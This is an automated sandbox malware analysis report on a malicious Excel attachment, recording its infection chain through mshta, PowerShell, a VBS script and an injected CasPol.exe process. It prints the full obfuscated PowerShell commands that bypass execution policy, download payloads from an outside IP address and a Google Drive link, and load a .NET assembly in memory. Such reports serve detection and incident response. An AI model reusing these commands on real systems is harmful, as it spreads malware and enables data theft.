          Source: 7B130000.0.drStream path 'MBD014C1E4E/\x1Ole' : https://acesso.run/KJAPmB?&internet=cooperative&crew=salty&corral=momentous&eyestrainwE{1C*|/".3<AjDl?/a|MC{qo3~zZ!#5'9)I)2y&=7cp(YmMCYgK?N".D l8_Z}1_py{qXzFlp*IU=mvBI2Sc0CDRg?&GtZc*T5XCb5UHP64ExMzL9BeKzDMl0TEy1aHsvRa71roB1scx0pykPKUyTJHlXZ7mtQUGyoycxQYWnnUO1ubUyICMBRB89yONvnDJRoP3nWzFIidyrtxboDDCxVwPNn07HNeFaKcNw9cO4lqjgxGMexY0=o4+B2VE?.PPH
          Source: ~DFE74F55484018A372.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004169A7 appears 87 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 0044DB70 appears 41 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004165FF appears 35 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00422297 appears 42 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00444B5A appears 37 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00413025 appears 79 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00416760 appears 69 times
          Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
          Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2286
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2286
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2286Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2286
          Source: Process Memory Space: powershell.exe PID: 2140, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: Process Memory Space: powershell.exe PID: 3972, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
          Source: bhv2DF4.tmp.46.dr, bhv417.tmp.31.drBinary or memory string: org.slneighbors
          Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winXLS@76/50@10/8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,31_2_004182CE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 42_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,42_2_00410DE1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,31_2_00418758
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle,31_2_00413D4C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,31_2_0040B58D
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\7B130000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-RXIGCE
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR7DB7.tmpJump to behavior
          Source: A & C Metrology OC 545714677889Materiale.xlsOLE indicator, Workbook stream: true
          Source: 7B130000.0.drOLE indicator, Workbook stream: true
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgreatnewswithgoodthingsonbe.vbs"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............0.m.......m..............................................................3......X...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................m.....}..w......m......................1......(.P.....................X...............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P................m.......m.....}..w.............................1......(.P..............3......................@.].............Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm................&......Vck....}..w....@.].....\.......................(.P.......................&.............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................@.].....}..w............0'i.....UVck......h.....(.P.....................................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm................&......Vck....}..w....@.].....\.......................(.P.......................&.............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................@.].....}..w............0'i.....UVck......h.....(.P.....................................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.......&.....N.......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.0'i.....UVck......h.....(.P.......................&..... .......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .d.E.v.I.c.E.C.r.e.D.E.n.T.I.a.l.d.E.p.L.O.Y.M.e.n.t...E.X.E...................&.....@.......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~...................&.....@.......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................@.].....}..w............0'i.....UVck......h.....(.P.....................................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.....&.....N.......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................@.].....}..w............0'i.....UVck......h.....(.P.............................l.......................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......@.].....}..w............0'i.....UVck......h.....(.P.......................&.............................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............T.r.u.e...m.....}..w.............................1......(.P..............3......................@b..............Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................m.....}..w......m......................1......(.P.....................................................Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............0.m.......m.......!.......................!.......!......................3........................!.............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................m.....}..w......m......................1......(.P.....8.......x.......................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P................m.......m.....}..w.............................1......(.P..............3...................... ...............
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.........................l....}..w.... .......\.......................(.P.....8.......x.......X...............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................ .......}..w..............o.....^..l....X.n.....(.P.....8.......x.......................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm.........................l....}..w.... .......\.......................(.P.....8.......x.......X...............................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................ .......}..w..............o.....^..l....X.n.....(.P.....8.......x.......................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.............N.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1...o.....^..l....X.n.....(.P.....8.......x............... .......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .d.E.v.I.c.E.C.r.e.D.E.n.T.I.a.l.d.E.p.L.O.Y.M.e.n.t...E.X.E.8.......x...............@.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.8.......x...............@.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................ .......}..w..............o.....^..l....X.n.....(.P.....8.......x.......................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .S.t.r.i.n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...........N.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................ .......}..w..............o.....^..l....X.n.....(.P.....8.......x...............l.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ....... .......}..w..............o.....^..l....X.n.....(.P.....8.......x.......................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: .................P..............T.r.u.e...m.....}..w.............................1......(.P..............3......................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................h(........................m.....}..w......m......................1......(.P.....................................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w............8.......8.......@"......(.P.....................................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm........................Yk....}..w............\.......................(.P.....................................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.8.8.1......)Yk.....bi.....(.P.....................x.......$.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................Cm........................Yk....}..w............\.......................(.P.....................................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w.............nY......)Yk.....bi.....(.P.....................................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w.............nY......)Yk.....bi.....(.P.....................................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w.............nY......)Yk.....bi.....(.P.....................................................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................................}..w.............nY......)Yk.....bi.....(.P.............................T.......................
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ ...............}..w.............nY......)Yk.....bi.....(.P.....................x...............................
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSystem information queried: HandleInformation
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
          Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: CasPol.exe, CasPol.exe, 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
          Source: CasPol.exe, CasPol.exe, 00000029.00000002.501693447.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
          Source: CasPol.exe, 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
          Source: CasPol.exe, CasPol.exe, 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
          Source: CasPol.exe, CasPol.exe, 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
          Source: CasPol.exe, CasPol.exe, 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
          Source: CasPol.exe, CasPol.exe, 0000001F.00000002.512512687.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
          Source: A & C Metrology OC 545714677889Materiale.xlsReversingLabs: Detection: 21%
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_41-33246
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYStEM32\windOWSpOWErsHeLL\V1.0\PoWERShelL.exe" "PoweRshElL.EXe -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE ; IeX($(Iex('[SYSTem.texT.enCoDIng]'+[chAR]0X3a+[cHAR]58+'UTf8.gETsTRInG([sYSTEM.CONverT]'+[cHAr]0x3a+[Char]58+'fRoMBASe64STrIng('+[cHaR]34+'JFhETklVVk0yVTJQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlRmlOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0xBYWd3b3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHUmosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd3cCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdlcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJiZUtsQXF0QWEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB1TlFCdkdFdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWEROSVVWTTJVMlA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjE0Ni40Ni81Ny9waWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmdzb25iZXN0cGxhY2UudElGIiwiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3NvbmJlLnZicyIsMCwwKTtTVEFydC1zbGVlcCgzKTtTdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc29uYmUudmJzIg=='+[chAr]34+'))')))"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.cmdline"
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7A10.tmp" "c:\Users\user\AppData\Local\Temp\xcygtrxb\CSC209022CC148748BB8468879EDEB89E99.TMP"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgreatnewswithgoodthingsonbe.vbs"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSG9NRVsyMV0rJFBzaE9tRVszMF0rJ3gnKSgoJ1prYWltYWdlVXJsID0gUUN4aHQnKyd0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjYnKyd2UzRzVU95Ym5ILXNEdlVoQll3dXIgUUN4O1prYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQ7WmthaW1hZ2VCJysneXRlcyA9IFprYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoWmthaW1hZ2VVcmwpO1prYWltYWdlVGV4dCA9IFtTeXN0JysnZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFprYWltYWdlQnl0ZXMpO1prYXN0YXJ0RmxhZyA9IFFDeDwnKyc8QkFTRTY0X1NUQVJUPj5RQ3g7WmthZW5kRmxhZyA9IFFDeDw8QkFTRTY0X0VORD4+UUN4O1prYXN0YXJ0SW5kZXggPSBaa2FpbWFnZVRleHQuSW5kZXhPZihaa2FzdGFydEZsYWcpO1prYWVuZEluZGV4ID0gWmthaW1hZ2VUZXh0LkluZGV4T2YoWmthZW5kRmxhZycrJyk7Wmthc3RhcnRJbmRleCAtZ2UgMCAtYW4nKydkIFprYWVuZEluZGV4IC1ndCBaJysna2FzdCcrJ2FydEluZGV4O1prYXN0YXJ0SW4nKydkZXggKz0gWmthc3RhcnRGbGFnLkxlbmd0aDtaa2FiYXNlNjRMZW5ndGgnKycgPSBaa2FlbmRJbmRleCAtIFprYXN0YXJ0SW5kZXg7WmthYmFzZTY0Q29tbWFuZCA9IFprYWltYWdlVGV4dC5TdWJzdHJpbicrJ2coWmthc3RhcnRJbmRleCwgJysnWmthYmFzJysnZTY0TGVuZ3RoKTtaa2FiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChaa2FiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgS041IEZvckVhY2gtT2JqZWN0IHsgWmsnKydhXyB9KVstMS4uLShaa2FiJysnYXMnKydlNjRDb21tYW5kLkxlbmd0aCldO1prYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlJysnNjRTdHJpbmcoWmthYmFzZTY0UmV2ZXJzZWQpO1prYWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChaa2Fjb21tYScrJ25kQnl0ZXMpO1prYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoUUN4VkFJUUN4KTtaa2F2YWlNZXRob2QuSW52b2tlKFprYW51bGwsIEAoUUN4dHh0LlJSRlZHR0ZSLzc1LzY0LjY0MS40NzEuNzAxLy86cHR0aFFDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUMnKyd4ZGVzYXRpdmFkb1FDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUN4Q2FzJysnUG9sUUN4LCBRQ3hkZXNhdGl2YWRvUScrJ0N4LCBRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3gxUUN4LFFDeGRlc2F0aXZhZG9RQ3gpKTsnKS5yRVBMYUNlKChbY0hhUl05MCtbY0hhUl0xMDcrW2NIYVJdOTcpLFtzVHJJbmddW2NIYVJdMzYpLnJFUExhQ2UoJ0tONScsW3NUckluZ11bY0hhUl0xMjQpLnJFUExhQ2UoKFtjSGFSXTgxK1tjSGFSXTY3K1tjSGFSXTEyMCksW3NUckluZ11bY0hhUl0zOSkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHoME[21]+$PshOmE[30]+'x')(('ZkaimageUrl = QCxht'+'tps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur QCx;ZkawebClient = New-Object Sy'+'stem.Net.WebClient;ZkaimageB'+'ytes = ZkawebClient.DownloadData(ZkaimageUrl);ZkaimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(ZkaimageBytes);ZkastartFlag = QCx<'+'<BASE64_START>>QCx;ZkaendFlag = QCx<<BASE64_END>>QCx;ZkastartIndex = ZkaimageText.IndexOf(ZkastartFlag);ZkaendIndex = ZkaimageText.IndexOf(ZkaendFlag'+');ZkastartIndex -ge 0 -an'+'d ZkaendIndex -gt Z'+'kast'+'artIndex;ZkastartIn'+'dex += ZkastartFlag.Length;Zkabase64Length'+' = ZkaendIndex - ZkastartIndex;Zkabase64Command = ZkaimageText.Substrin'+'g(ZkastartIndex, '+'Zkabas'+'e64Length);Zkabase64Reversed = -join (Zkabase64Command.ToCharArray() KN5 ForEach-Object { Zk'+'a_ })[-1..-(Zkab'+'as'+'e64Command.Length)];ZkacommandBytes = [System.'+'Convert]::FromBase'+'64String(Zkabase64Reversed);ZkaloadedAssembly = [System.Reflection.Assembly]::Load(Zkacomma'+'ndBytes);ZkavaiMethod = [dnlib.IO.Home].Ge'+'tMethod(QCxVAIQCx);ZkavaiMethod.Invoke(Zkanull, @(QCxtxt.RRFVGGFR/75/64.641.471.701//:ptthQCx, QCxdesativadoQCx, QC'+'xdesativadoQCx, QCxdesativadoQCx, QCxCas'+'PolQCx, QCxdesativadoQ'+'Cx, QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCx1QCx,QCxdesativadoQCx));').rEPLaCe(([cHaR]90+[cHaR]107+[cHaR]97),[sTrIng][cHaR]36).rEPLaCe('KN5',[sTrIng][cHaR]124).rEPLaCe(([cHaR]81+[cHaR]67+[cHaR]120),[sTrIng][cHaR]39))"
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
